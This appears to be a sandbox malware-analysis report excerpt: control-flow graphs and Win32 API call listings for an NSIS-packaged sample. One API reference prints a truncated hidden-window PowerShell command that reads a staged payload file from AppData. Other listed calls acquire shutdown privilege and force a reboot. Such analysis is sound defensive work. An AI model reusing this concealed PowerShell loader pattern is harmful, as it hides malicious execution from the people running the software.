401ee5 3822->3823 3824 4058f2 2 API calls 3823->3824 3825 401eeb 3824->3825 3826 4028a1 3825->3826 3827 401f4a CloseHandle 3825->3827 3828 401efb WaitForSingleObject 3825->3828 3827->3826 3829 401f0d 3828->3829 3830 401f1f GetExitCodeProcess 3829->3830 3833 406628 2 API calls 3829->3833 3831 401f31 3830->3831 3832 401f3e 3830->3832 3837 406159 wsprintfW 3831->3837 3832->3827 3835 401f3c 3832->3835 3836 401f14 WaitForSingleObject 3833->3836 3835->3827 3836->3829 3837->3835 4027 401956 4028 402c53 18 API calls 4027->4028 4029 40195d lstrlenW 4028->4029 4030 4025a8 4029->4030 4031 4014d7 4032 402c31 18 API calls 4031->4032 4033 4014dd Sleep 4032->4033 4035 402adb 4033->4035 4036 401f58 4037 402c53 18 API calls 4036->4037 4038 401f5f 4037->4038 4039 406555 2 API calls 4038->4039 4040 401f65 4039->4040 4042 401f76 4040->4042 4043 406159 wsprintfW 4040->4043 4043->4042 4044 402259 4045 402c53 18 API calls 4044->4045 4046 40225f 4045->4046 4047 402c53 18 API calls 4046->4047 4048 402268 4047->4048 4049 402c53 18 API calls 4048->4049 4050 402271 4049->4050 4051 406555 2 API calls 4050->4051 4052 40227a 4051->4052 4053 40228b lstrlenW lstrlenW 4052->4053 4057 40227e 4052->4057 4055 405371 25 API calls 4053->4055 4054 405371 25 API calls 4058 402286 4054->4058 4056 4022c9 SHFileOperationW 4055->4056 4056->4057 4056->4058 4057->4054 4057->4058 4059 4068da 4063 40675e 4059->4063 4060 4070c9 4061 4067e8 GlobalAlloc 4061->4060 4061->4063 4062 4067df GlobalFree 4062->4061 4063->4060 4063->4061 4063->4062 4064 406856 GlobalFree 4063->4064 4065 40685f GlobalAlloc 4063->4065 4064->4065 4065->4060 4065->4063 3838 40175c 3839 402c53 18 API calls 3838->3839 3840 401763 3839->3840 3841 405e16 2 API calls 3840->3841 3842 40176a 3841->3842 3843 405e16 2 API calls 3842->3843 3843->3842 4066 4022dd 4067 4022e4 4066->4067 4070 4022f7 4066->4070 4068 406234 18 API calls 4067->4068 4069 4022f1 4068->4069 4071 405957 MessageBoxIndirectW 4069->4071 4071->4070 4072 402660 4073 402c31 18 API calls 
4072->4073 4074 40266f 4073->4074 4075 4026b9 ReadFile 4074->4075 4076 405e6a ReadFile 4074->4076 4077 4026f9 MultiByteToWideChar 4074->4077 4078 4027ae 4074->4078 4081 40271f SetFilePointer MultiByteToWideChar 4074->4081 4082 4027bf 4074->4082 4084 4027ac 4074->4084 4085 405ec8 SetFilePointer 4074->4085 4075->4074 4075->4084 4076->4074 4077->4074 4094 406159 wsprintfW 4078->4094 4081->4074 4083 4027e0 SetFilePointer 4082->4083 4082->4084 4083->4084 4086 405ee4 4085->4086 4091 405f00 4085->4091 4087 405e6a ReadFile 4086->4087 4088 405ef0 4087->4088 4089 405f31 SetFilePointer 4088->4089 4090 405f09 SetFilePointer 4088->4090 4088->4091 4089->4091 4090->4089 4092 405f14 4090->4092 4091->4074 4093 405e99 WriteFile 4092->4093 4093->4091 4094->4084 4095 401563 4096 402a81 4095->4096 4099 406159 wsprintfW 4096->4099 4098 402a86 4099->4098 4107 4052e5 4108 4052f5 4107->4108 4109 405309 4107->4109 4110 4052fb 4108->4110 4119 405352 4108->4119 4111 405311 IsWindowVisible 4109->4111 4114 405328 4109->4114 4112 404322 SendMessageW 4110->4112 4113 40531e 4111->4113 4111->4119 4116 405305 4112->4116 4120 404c3b SendMessageW 4113->4120 4115 405357 CallWindowProcW 4114->4115 4125 404cbb 4114->4125 4115->4116 4119->4115 4121 404c9a SendMessageW 4120->4121 4122 404c5e GetMessagePos ScreenToClient SendMessageW 4120->4122 4124 404c92 4121->4124 4123 404c97 4122->4123 4122->4124 4123->4121 4124->4114 4134 406212 lstrcpynW 4125->4134 4127 404cce 4135 406159 wsprintfW 4127->4135 4129 404cd8 4130 40140b 2 API calls 4129->4130 4131 404ce1 4130->4131 4136 406212 lstrcpynW 4131->4136 4133 404ce8 4133->4119 4134->4127 4135->4129 4136->4133 4137 401968 4138 402c31 18 API calls 4137->4138 4139 40196f 4138->4139 4140 402c31 18 API calls 4139->4140 4141 40197c 4140->4141 4142 402c53 18 API calls 4141->4142 4143 401993 lstrlenW 4142->4143 4144 4019a4 4143->4144 4145 4019e5 4144->4145 4149 406212 lstrcpynW 4144->4149 4147 4019d5 4147->4145 4148 4019da lstrlenW 4147->4148 4148->4145 4149->4147 3331 
403969 3332 403984 3331->3332 3333 40397a CloseHandle 3331->3333 3334 403998 3332->3334 3335 40398e CloseHandle 3332->3335 3333->3332 3340 4039c6 3334->3340 3335->3334 3338 405a03 69 API calls 3339 4039a9 3338->3339 3341 4039d4 3340->3341 3342 40399d 3341->3342 3343 4039d9 FreeLibrary GlobalFree 3341->3343 3342->3338 3343->3342 3343->3343 3641 4023ea 3642 4023f0 3641->3642 3643 402c53 18 API calls 3642->3643 3644 402402 3643->3644 3645 402c53 18 API calls 3644->3645 3646 40240c RegCreateKeyExW 3645->3646 3647 402436 3646->3647 3649 4028a1 3646->3649 3648 402451 3647->3648 3650 402c53 18 API calls 3647->3650 3651 40245d 3648->3651 3658 402c31 3648->3658 3653 402447 lstrlenW 3650->3653 3652 40247c RegSetValueExW 3651->3652 3655 40317b 45 API calls 3651->3655 3656 402492 RegCloseKey 3652->3656 3653->3648 3655->3652 3656->3649 3659 406234 18 API calls 3658->3659 3660 402c46 3659->3660 3660->3651 4150 40166a 4151 402c53 18 API calls 4150->4151 4152 401670 4151->4152 4153 406555 2 API calls 4152->4153 4154 401676 4153->4154 4155 4043ea lstrcpynW lstrlenW 4156 404ced GetDlgItem GetDlgItem 4157 404d3f 7 API calls 4156->4157 4161 404f58 4156->4161 4158 404de2 DeleteObject 4157->4158 4159 404dd5 SendMessageW 4157->4159 4160 404deb 4158->4160 4159->4158 4162 404e22 4160->4162 4164 406234 18 API calls 4160->4164 4175 404c3b 5 API calls 4161->4175 4179 40503c 4161->4179 4188 404fc9 4161->4188 4165 4042d6 19 API calls 4162->4165 4163 4050e8 4168 4050f2 SendMessageW 4163->4168 4169 4050fa 4163->4169 4170 404e04 SendMessageW SendMessageW 4164->4170 4166 404e36 4165->4166 4171 4042d6 19 API calls 4166->4171 4167 404f4b 4173 40433d 8 API calls 4167->4173 4168->4169 4180 405113 4169->4180 4181 40510c ImageList_Destroy 4169->4181 4185 405123 4169->4185 4170->4160 4189 404e44 4171->4189 4172 405095 SendMessageW 4172->4167 4177 4050aa SendMessageW 4172->4177 4178 4052de 4173->4178 4174 40502e SendMessageW 4174->4179 4175->4188 4176 405292 4176->4167 4186 4052a4 ShowWindow GetDlgItem 
ShowWindow 4176->4186 4184 4050bd 4177->4184 4179->4163 4179->4167 4179->4172 4182 40511c GlobalFree 4180->4182 4180->4185 4181->4180 4182->4185 4183 404f19 GetWindowLongW SetWindowLongW 4187 404f32 4183->4187 4194 4050ce SendMessageW 4184->4194 4185->4176 4199 404cbb 4 API calls 4185->4199 4203 40515e 4185->4203 4186->4167 4190 404f50 4187->4190 4191 404f38 ShowWindow 4187->4191 4188->4174 4188->4179 4189->4183 4193 404e94 SendMessageW 4189->4193 4195 404f13 4189->4195 4197 404ed0 SendMessageW 4189->4197 4198 404ee1 SendMessageW 4189->4198 4208 40430b SendMessageW 4190->4208 4207 40430b SendMessageW 4191->4207 4193->4189 4194->4163 4195->4183 4195->4187 4197->4189 4198->4189 4199->4203 4200 405268 InvalidateRect 4200->4176 4201 40527e 4200->4201 4209 404bf6 4201->4209 4202 40518c SendMessageW 4206 4051a2 4202->4206 4203->4202 4203->4206 4205 405216 SendMessageW SendMessageW 4205->4206 4206->4200 4206->4205 4207->4167 4208->4161 4212 404b2d 4209->4212 4211 404c0b 4211->4176 4213 404b46 4212->4213 4214 406234 18 API calls 4213->4214 4215 404baa 4214->4215 4216 406234 18 API calls 4215->4216 4217 404bb5 4216->4217 4218 406234 18 API calls 4217->4218 4219 404bcb lstrlenW wsprintfW SetDlgItemTextW 4218->4219 4219->4211 4220 401ced 4221 402c31 18 API calls 4220->4221 4222 401cf3 IsWindow 4221->4222 4223 401a20 4222->4223 3698 40176f 3699 402c53 18 API calls 3698->3699 3700 401776 3699->3700 3701 401796 3700->3701 3702 40179e 3700->3702 3737 406212 lstrcpynW 3701->3737 3738 406212 lstrcpynW 3702->3738 3705 40179c 3709 4064a6 5 API calls 3705->3709 3706 4017a9 3707 405bc6 3 API calls 3706->3707 3708 4017af lstrcatW 3707->3708 3708->3705 3725 4017bb 3709->3725 3710 406555 2 API calls 3710->3725 3711 405dc2 2 API calls 3711->3725 3713 4017cd CompareFileTime 3713->3725 3714 40188d 3715 405371 25 API calls 3714->3715 3718 401897 3715->3718 3716 405371 25 API calls 3720 401879 3716->3720 3717 406212 lstrcpynW 3717->3725 3719 40317b 45 API calls 3718->3719 3721 4018aa 
3719->3721 3722 4018be SetFileTime 3721->3722 3723 4018d0 CloseHandle 3721->3723 3722->3723 3723->3720 3726 4018e1 3723->3726 3724 406234 18 API calls 3724->3725 3725->3710 3725->3711 3725->3713 3725->3714 3725->3717 3725->3724 3731 405957 MessageBoxIndirectW 3725->3731 3734 401864 3725->3734 3736 405de7 GetFileAttributesW CreateFileW 3725->3736 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406234 18 API calls 3727->3729 3730 406234 18 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3731->3725 3732->3733 3735 405957 MessageBoxIndirectW 3733->3735 3734->3716 3734->3720 3735->3720 3736->3725 3737->3705 3738->3706 4224 404771 4225 40479d 4224->4225 4226 4047ae 4224->4226 4285 40593b GetDlgItemTextW 4225->4285 4227 4047ba GetDlgItem 4226->4227 4230 404819 4226->4230 4229 4047ce 4227->4229 4233 4047e2 SetWindowTextW 4229->4233 4236 405c71 4 API calls 4229->4236 4238 406234 18 API calls 4230->4238 4247 4048fd 4230->4247 4283 404aac 4230->4283 4231 4047a8 4232 4064a6 5 API calls 4231->4232 4232->4226 4237 4042d6 19 API calls 4233->4237 4235 40433d 8 API calls 4240 404ac0 4235->4240 4241 4047d8 4236->4241 4242 4047fe 4237->4242 4243 40488d SHBrowseForFolderW 4238->4243 4239 40492d 4244 405cce 18 API calls 4239->4244 4241->4233 4249 405bc6 3 API calls 4241->4249 4245 4042d6 19 API calls 4242->4245 4246 4048a5 CoTaskMemFree 4243->4246 4243->4247 4248 404933 4244->4248 4250 40480c 4245->4250 4251 405bc6 3 API calls 4246->4251 4247->4283 4287 40593b GetDlgItemTextW 4247->4287 4288 406212 lstrcpynW 4248->4288 4249->4233 4286 40430b SendMessageW 4250->4286 4253 4048b2 4251->4253 4257 4048e9 SetDlgItemTextW 4253->4257 4260 406234 18 API calls 4253->4260 4255 40494a 4259 4065ec 5 API calls 4255->4259 4256 404812 4258 4065ec 5 API calls 4256->4258 4257->4247 4258->4230 4266 404951 4259->4266 4261 4048d1 lstrcmpiW 4260->4261 4261->4257 4263 4048e2 lstrcatW 4261->4263 4262 404992 4289 406212 lstrcpynW 4262->4289 4263->4257 4265 404999 4267 405c71 4 
API calls 4265->4267 4266->4262 4271 405c12 2 API calls 4266->4271 4272 4049ea 4266->4272 4268 40499f GetDiskFreeSpaceW 4267->4268 4270 4049c3 MulDiv 4268->4270 4268->4272 4270->4272 4271->4266 4273 404a5b 4272->4273 4275 404bf6 21 API calls 4272->4275 4274 404a7e 4273->4274 4277 40140b 2 API calls 4273->4277 4290 4042f8 KiUserCallbackDispatcher 4274->4290 4276 404a48 4275->4276 4278 404a5d SetDlgItemTextW 4276->4278 4279 404a4d 4276->4279 4277->4274 4278->4273 4281 404b2d 21 API calls 4279->4281 4281->4273 4282 404a9a 4282->4283 4291 404706 4282->4291 4283->4235 4285->4231 4286->4256 4287->4239 4288->4255 4289->4265 4290->4282 4292 404714 4291->4292 4293 404719 SendMessageW 4291->4293 4292->4293 4293->4283 4294 401b71 4295 401bc2 4294->4295 4296 401b7e 4294->4296 4298 401bc7 4295->4298 4299 401bec GlobalAlloc 4295->4299 4297 4022e4 4296->4297 4303 401b95 4296->4303 4301 406234 18 API calls 4297->4301 4312 401c07 4298->4312 4315 406212 lstrcpynW 4298->4315 4300 406234 18 API calls 4299->4300 4300->4312 4305 4022f1 4301->4305 4313 406212 lstrcpynW 4303->4313 4304 401bd9 GlobalFree 4304->4312 4308 405957 MessageBoxIndirectW 4305->4308 4307 401ba4 4314 406212 lstrcpynW 4307->4314 4308->4312 4310 401bb3 4316 406212 lstrcpynW 4310->4316 4313->4307 4314->4310 4315->4304 4316->4312 4317 401a72 4318 402c31 18 API calls 4317->4318 4319 401a78 4318->4319 4320 402c31 18 API calls 4319->4320 4321 401a20 4320->4321 4322 404473 4323 40448b 4322->4323 4328 4045a5 4322->4328 4329 4042d6 19 API calls 4323->4329 4324 40460f 4325 4046e1 4324->4325 4326 404619 GetDlgItem 4324->4326 4330 40433d 8 API calls 4325->4330 4327 404633 4326->4327 4331 4046a2 4326->4331 4327->4331 4336 404659 6 API calls 4327->4336 4328->4324 4328->4325 4332 4045e0 GetDlgItem SendMessageW 4328->4332 4333 4044f2 4329->4333 4335 4046dc 4330->4335 4331->4325 4337 4046b4 4331->4337 4353 4042f8 KiUserCallbackDispatcher 4332->4353 4334 4042d6 19 API calls 4333->4334 4339 4044ff CheckDlgButton 4334->4339 4336->4331 
4340 4046ca 4337->4340 4341 4046ba SendMessageW 4337->4341 4351 4042f8 KiUserCallbackDispatcher 4339->4351 4340->4335 4344 4046d0 SendMessageW 4340->4344 4341->4340 4342 40460a 4345 404706 SendMessageW 4342->4345 4344->4335 4345->4324 4346 40451d GetDlgItem 4352 40430b SendMessageW 4346->4352 4348 404533 SendMessageW 4349 404550 GetSysColor 4348->4349 4350 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4348->4350 4349->4350 4350->4335 4351->4346 4352->4348 4353->4342 4354 401573 4355 401583 ShowWindow 4354->4355 4356 40158c 4354->4356 4355->4356 4357 40159a ShowWindow 4356->4357 4358 402adb 4356->4358 4357->4358 4359 4014f5 SetForegroundWindow 4360 402adb 4359->4360 4361 401e77 4362 402c53 18 API calls 4361->4362 4363 401e7d 4362->4363 4364 402c53 18 API calls 4363->4364 4365 401e86 4364->4365 4366 402c53 18 API calls 4365->4366 4367 401e8f 4366->4367 4368 402c53 18 API calls 4367->4368 4369 401e98 4368->4369 4370 401423 25 API calls 4369->4370 4371 401e9f ShellExecuteW 4370->4371 4372 401ed0 4371->4372 4380 40167b 4381 402c53 18 API calls 4380->4381 4382 401682 4381->4382 4383 402c53 18 API calls 4382->4383 4384 40168b 4383->4384 4385 402c53 18 API calls 4384->4385 4386 401694 MoveFileW 4385->4386 4387 4016a0 4386->4387 4388 4016a7 4386->4388 4390 401423 25 API calls 4387->4390 4389 406555 2 API calls 4388->4389 4392 402250 4388->4392 4391 4016b6 4389->4391 4390->4392 4391->4392 4393 4060b3 38 API calls 4391->4393 4393->4387 3844 403dfe 3845 403f51 3844->3845 3846 403e16 3844->3846 3848 403f62 GetDlgItem GetDlgItem 3845->3848 3849 403fa2 3845->3849 3846->3845 3847 403e22 3846->3847 3850 403e40 3847->3850 3851 403e2d SetWindowPos 3847->3851 3852 4042d6 19 API calls 3848->3852 3853 403ffc 3849->3853 3858 401389 2 API calls 3849->3858 3855 403e45 ShowWindow 3850->3855 3856 403e5d 3850->3856 3851->3850 3857 403f8c SetClassLongW 3852->3857 3854 404322 SendMessageW 3853->3854 3874 403f4c 3853->3874 3884 40400e 3854->3884 3855->3856 3859 403e65 
DestroyWindow 3856->3859 3860 403e7f 3856->3860 3861 40140b 2 API calls 3857->3861 3862 403fd4 3858->3862 3913 40425f 3859->3913 3863 403e84 SetWindowLongW 3860->3863 3864 403e95 3860->3864 3861->3849 3862->3853 3865 403fd8 SendMessageW 3862->3865 3863->3874 3868 403ea1 GetDlgItem 3864->3868 3869 403f3e 3864->3869 3865->3874 3866 40140b 2 API calls 3866->3884 3867 404261 DestroyWindow KiUserCallbackDispatcher 3867->3913 3870 403ed1 3868->3870 3871 403eb4 SendMessageW IsWindowEnabled 3868->3871 3872 40433d 8 API calls 3869->3872 3876 403ede 3870->3876 3877 403f25 SendMessageW 3870->3877 3878 403ef1 3870->3878 3888 403ed6 3870->3888 3871->3870 3871->3874 3872->3874 3873 404290 ShowWindow 3873->3874 3875 406234 18 API calls 3875->3884 3876->3877 3876->3888 3877->3869 3881 403ef9 3878->3881 3882 403f0e 3878->3882 3879 4042af SendMessageW 3883 403f0c 3879->3883 3880 4042d6 19 API calls 3880->3884 3886 40140b 2 API calls 3881->3886 3885 40140b 2 API calls 3882->3885 3883->3869 3884->3866 3884->3867 3884->3874 3884->3875 3884->3880 3889 4042d6 19 API calls 3884->3889 3904 4041a1 DestroyWindow 3884->3904 3887 403f15 3885->3887 3886->3888 3887->3869 3887->3888 3888->3879 3890 404089 GetDlgItem 3889->3890 3891 4040a6 ShowWindow KiUserCallbackDispatcher 3890->3891 3892 40409e 3890->3892 3914 4042f8 KiUserCallbackDispatcher 3891->3914 3892->3891 3894 4040d0 EnableWindow 3897 4040e4 3894->3897 3895 4040e9 GetSystemMenu EnableMenuItem SendMessageW 3896 404119 SendMessageW 3895->3896 3895->3897 3896->3897 3897->3895 3915 40430b SendMessageW 3897->3915 3916 406212 lstrcpynW 3897->3916 3900 404147 lstrlenW 3901 406234 18 API calls 3900->3901 3902 40415d SetWindowTextW 3901->3902 3903 401389 2 API calls 3902->3903 3903->3884 3905 4041bb CreateDialogParamW 3904->3905 3904->3913 3906 4041ee 3905->3906 3905->3913 3907 4042d6 19 API calls 3906->3907 3908 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3907->3908 3909 401389 2 API calls 3908->3909 3910 40423f 3909->3910 
3910->3874 3911 404247 ShowWindow 3910->3911 3912 404322 SendMessageW 3911->3912 3912->3913 3913->3873 3913->3874 3914->3894 3915->3897 3916->3900 3917 40287e 3918 402c53 18 API calls 3917->3918 3919 402885 FindFirstFileW 3918->3919 3920 402898 3919->3920 3921 4028ad 3919->3921 3922 4028b6 3921->3922 3925 406159 wsprintfW 3921->3925 3926 406212 lstrcpynW 3922->3926 3925->3922 3926->3920 4394 4019ff 4395 402c53 18 API calls 4394->4395 4396 401a06 4395->4396 4397 402c53 18 API calls 4396->4397 4398 401a0f 4397->4398 4399 401a16 lstrcmpiW 4398->4399 4400 401a28 lstrcmpW 4398->4400 4401 401a1c 4399->4401 4400->4401 4402 401000 4403 401037 BeginPaint GetClientRect 4402->4403 4404 40100c DefWindowProcW 4402->4404 4406 4010f3 4403->4406 4407 401179 4404->4407 4408 401073 CreateBrushIndirect FillRect DeleteObject 4406->4408 4409 4010fc 4406->4409 4408->4406 4410 401102 CreateFontIndirectW 4409->4410 4411 401167 EndPaint 4409->4411 4410->4411 4412 401112 6 API calls 4410->4412 4411->4407 4412->4411 4413 401503 4414 40150b 4413->4414 4416 40151e 4413->4416 4415 402c31 18 API calls 4414->4415 4415->4416 4417 402104 4418 402c53 18 API calls 4417->4418 4419 40210b 4418->4419 4420 402c53 18 API calls 4419->4420 4421 402115 4420->4421 4422 402c53 18 API calls 4421->4422 4423 40211f 4422->4423 4424 402c53 18 API calls 4423->4424 4425 402129 4424->4425 4426 402c53 18 API calls 4425->4426 4428 402133 4426->4428 4427 402172 CoCreateInstance 4432 402191 4427->4432 4428->4427 4429 402c53 18 API calls 4428->4429 4429->4427 4430 401423 25 API calls 4431 402250 4430->4431 4432->4430 4432->4431 4433 402805 4434 40280c 4433->4434 4436 402a86 4433->4436 4435 402c31 18 API calls 4434->4435 4437 402813 4435->4437 4438 402822 SetFilePointer 4437->4438 4438->4436 4439 402832 4438->4439 4441 406159 wsprintfW 4439->4441 4441->4436 3661 40230c 3662 402314 3661->3662 3665 40231a 3661->3665 3663 402c53 18 API calls 3662->3663 3663->3665 3664 402c53 18 API calls 3666 402328 3664->3666 3665->3664 
        Control-flow graph node/edge listing for the functions below collapsed to what is recoverable from the text: each function's start address and the Win32 APIs reached from it (subroutines that reach no named API are given by address only).
        • 0x402336 (tail of a function whose start precedes this section): WritePrivateProfileStringW at 0x40233f
        • 0x40190c: calls 0x405a03 (69 API calls; the FindFirstFileW/FindNextFileW/DeleteFileW routine graphed further below)
        • 0x401f8c: 0x4065ec (GetModuleHandleA/GetProcAddress import resolver), GlobalAlloc, wsprintfW
        • 0x40258c: 0x405de7 (GetFileAttributesW, CreateFileW)
        • 0x40238e: RegOpenKeyExW (via 0x402d5d), RegDeleteValueW, RegCloseKey; via the self-recursing helper 0x402c93: RegOpenKeyExW, RegEnumKeyW, RegCloseKey, RegDeleteKeyW (recursive key deletion)
        • 0x401d0e: GetDlgItem
        • 0x40190f: 0x405957 (MessageBoxIndirectW)
        • 0x402511: RegEnumKeyW, RegEnumValueW, RegCloseKey
        • 0x401491: 0x405371 (25 API calls)
        • 0x402d98: SetTimer, MulDiv, wsprintfW, SetWindowTextW, SetDlgItemTextW
        • 0x401c19: FindWindowExW, SendMessageW, SendMessageTimeoutW
        • 0x403a19: GlobalAlloc
        • 0x40249d: RegQueryValueExW, RegCloseKey, wsprintfW
        • 0x40149e: PostQuitMessage
        • 0x4015a3: SetFileAttributesW
        • 0x404424: lstrlenW, WideCharToMultiByte
        • 0x40472a: SetDlgItemTextW (via 0x4042d6), 0x40433d (8 API calls)
        • 0x4025ae: WideCharToMultiByte, lstrlenA, lstrlenW, WriteFile (via 0x405e99), 0x405ec8 (5 API calls)
        • 0x4054b0: GetDlgItem, CreateThread, CloseHandle, ShowWindow, GetClientRect, GetSystemMetrics, SendMessageW, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard; its helper 0x40433d: GetWindowLongW, GetSysColor, SetBkMode, SetTextColor, SetBkColor, CreateBrushIndirect, DeleteObject (this function is graphed in full below)
        • 0x401a30: ExpandEnvironmentStringsW, lstrcmpW
        • 0x402032: GetModuleHandleW, LoadLibraryExW, WideCharToMultiByte and GetProcAddress (via 0x40665b), FreeLibrary, plus calls into 0x401423 and 0x405371 (the LoadLibraryExW/GetProcAddress/FreeLibrary sequence is how NSIS loads and invokes plugin DLLs from its ns????.tmp directory)
        • 0x401d33: SetWindowLongW
        • 0x401db3: GetDC, GetDeviceCaps, MulDiv, ReleaseDC, CreateFontIndirectW
        • 0x401735: SearchPathW
        • 0x402ab6: SendMessageW, InvalidateRect
        • 0x402837: FindClose
        • 0x4014b8: 0x401389 (2 API calls)
        • 0x4029be: lstrcpynW (via 0x406212), wsprintfW (via 0x406159)

        Control-flow Graph

        Node/edge listing for the function at 0x40344a-0x403963 collapsed (the executed / not-executed colouring of the graph does not survive in the text). What the graph shows, in block order:
        • 0x40344a-0x40350a: SetErrorMode, GetVersion, import resolution through 0x4065ec (GetModuleHandleA/GetProcAddress), lstrlenA("UXTHEME"), COMCTL32 ordinal #17 (InitCommonControls), OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW
        • 0x403529-0x403658: command-line scanning loop (CharNextW, subroutine 0x405bf3)
        • 0x40365a-0x4036c6: GetTempPathW, then GetWindowsDirectoryW + "\Temp", then GetTempPathW + "Low", each tried in turn through 0x403419; on success SetEnvironmentVariableW for TEMP and TMP, so the installer's own TEMP/TMP may differ from the parent's
        • 0x4036cc-0x403793: DeleteFileW, subroutine 0x402ed5, then ExitProcess/CoUninitialize; the failure path 0x4037ad-0x4037bd reports through 0x405957 (MessageBoxIndirectW) and calls ExitProcess
        • 0x4037c3-0x4038c8: builds "<temp>\~nsu<x>.tmp", lstrcmpiW against the sample's own directory, SetCurrentDirectoryW, DeleteFileW and CopyFileW of the sample executable itself, CloseHandle (the NSIS "~nsu" self-copy used when running as an uninstaller)
        • 0x4038cd-0x403963: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW(SeShutdownPrivilege), AdjustTokenPrivileges, ExitWindowsEx(0x2 = EWX_REBOOT, 0x80040002 = SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION), ExitProcess; this is the reboot branch behind the "Contains functionality to shutdown / reboot the system" signature, and whether it executed in this run is not recoverable from the listing
        APIs
        • SetErrorMode.KERNELBASE ref: 0040346D
        • GetVersion.KERNEL32 ref: 00403473
        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
        • #17.COMCTL32(00000007,00000009), ref: 004034BF
        • OleInitialize.OLE32(00000000), ref: 004034C6
        • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
        • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000), ref: 0040350A
        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000020), ref: 00403531
          • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
          • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
        • DeleteFileW.KERNELBASE(1033), ref: 004036D1
          • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
        • ExitProcess.KERNEL32(?), ref: 00403797
        • CoUninitialize.COMBASE(?), ref: 0040379C
        • ExitProcess.KERNEL32 ref: 004037BD
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037D0
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037DF
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037EA
        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037F6
        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
        • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl,?), ref: 0040386C
        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ej86aa7Ki7.exe,00420EE8,00000001), ref: 00403880
        • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
        • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
        • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
        • ExitProcess.KERNEL32 ref: 00403963
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
